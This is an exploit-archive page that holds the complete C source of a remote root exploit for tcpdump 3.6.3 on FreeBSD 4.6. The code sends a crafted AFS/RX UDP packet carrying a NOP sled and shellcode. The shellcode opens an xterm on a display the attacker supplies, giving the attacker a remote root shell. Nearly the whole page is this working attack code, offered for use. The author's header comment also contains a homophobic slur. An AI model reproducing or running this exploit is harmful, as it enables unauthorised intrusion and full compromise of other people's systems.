exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

tcpdumpFBSD363.c

tcpdumpFBSD363.c
Posted Dec 24, 2002
Authored by Icesk

Tcpdump v3.6.3 remote root exploit. Tested against FreeBSD-4.6.

tags | exploit, remote, root
systems | freebsd
SHA-256 | c738ae09342cca2f263e6827dfaa5d34cca5a8098a2efa6c3adaa524156ad552

tcpdumpFBSD363.c

Change Mirror Download
   /* TCPDUMP 3.6.3 remote root exploit 
*
* tested against FreeBSD-4.6
*
* By: icesk
*
* Greets: meenor, optik, scsiu, stanly
* flames: ezoons (homo)
*/

#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>

#define ADDR 0xbffff248
#define OFFSET 0
#define NUM_ADDR 10
#define NOP 0x90
#define NUM_NOP 100

#define RX_CLIENT_INITIATED 1
#define RX_PACKET_TYPE_DATA 1
#define FS_RX_DPORT 7000
#define FS_RX_SPORT 7001
#define AFS_CALL 134

struct rx_header {
u_int32_t epoch;
u_int32_t cid;
u_int32_t callNumber;
u_int32_t seq;
u_int32_t serial;
u_char type;
u_char flags;
u_char userStatus;
u_char securityIndex;
u_short spare;
u_short serviceId;
};

char shellcode[] =
"\xeb\x57\x5e\xb3\x21\xfe\xcb\x88\x5e\x2c\x88\x5e\x23"
"\x88\x5e\x1f\x31\xdb\x88\x5e\x07\x46\x46\x88\x5e\x08"
"\x4e\x4e\x88\x5e\xFF\x89\x5e\xfc\x89\x76\xf0\x8d\x5e"
"\x08\x89\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x8d\x4e\xf0"
"\x89\xf3\x8d\x56\xfc\x31\xc0\xb0\x0e\x48\x48\x48\xcd"
"\x80\x31\xc0\x40\x31\xdb\xcd\x80\xAA\xAA\xAA\xAA\xBB"
"\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xDD\xDD\xDD\xDD\xe8\xa4"
"\xff\xff\xff"
"/bin/shZ-cZ/usr/X11R6/bin/xtermZ-utZ-displayZ";

long resolve(char *name) {
struct hostent *hp;
long ip;

if ((ip=inet_addr(name))==-1) {
if ((hp=gethostbyname(name))==NULL) {
fprintf (stderr,"Can't resolve host name [%s].\n",name);
exit(-1);
}
memcpy(&ip,(hp->h_addr),4);
}
return(ip);
}


int main (int argc, char *argv[]) {

struct sockaddr_in addr,sin;
int sock,aux, offset=OFFSET;
char buffer[4048], *chptr;
struct rx_header *rxh;
long int *lptr, return_addr=ADDR;


fprintf(stderr,"Tcpdump 3.6.3 remote exploit against FreeBSD 4.6\n\n");


if (argc<3) {
printf("Usage: %s [host] [display] [offset]\n",argv[0]);
exit(-1);
}

if (argc==4) offset=atoi(argv[3]);
return_addr+=offset;

fprintf(stderr,"Using return addr: %#x\n",return_addr);

addr.sin_family=AF_INET;
addr.sin_addr.s_addr=resolve(argv[1]);
addr.sin_port=htons(FS_RX_DPORT);

if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) {
perror("socket()");
exit(-1);
}

sin.sin_family=AF_INET;
sin.sin_addr.s_addr=INADDR_ANY;
sin.sin_port=htons(FS_RX_SPORT);

if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {
perror("bind()");
exit(-1);
}

memset(buffer,0,sizeof(buffer));
rxh=(struct rx_header *)buffer;

rxh->type=RX_PACKET_TYPE_DATA;
rxh->seq=htonl(1);
rxh->flags=RX_CLIENT_INITIATED;

lptr=(long int *)(buffer+sizeof(struct rx_header));
*(lptr++)=htonl(AFS_CALL);
*(lptr++)=htonl(1);
*(lptr++)=htonl(2);
*(lptr++)=htonl(3);

*(lptr++)=htonl(420);
chptr=(char *)lptr;
sprintf(chptr,"1 0\n");
chptr+=4;

memset(chptr,'A',120);
chptr+=120;
lptr=(long int *)chptr;
for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr;
chptr=(char *)lptr;
memset(chptr,NOP,NUM_NOP);
chptr+=NUM_NOP;
shellcode[30]=(char)(46+strlen(argv[2]));
memcpy(chptr,shellcode,strlen(shellcode));
chptr+=strlen(shellcode);
memcpy(chptr,argv[2],strlen(argv[2]));
chptr+=strlen(argv[2]);

sprintf(chptr," 1\n");

if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1) {
perror("send()");
exit(-1);
}

fprintf(stderr,"Packet Sent Waiting For Xterm!!!\n\n");

close(sock);
return(0);
}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close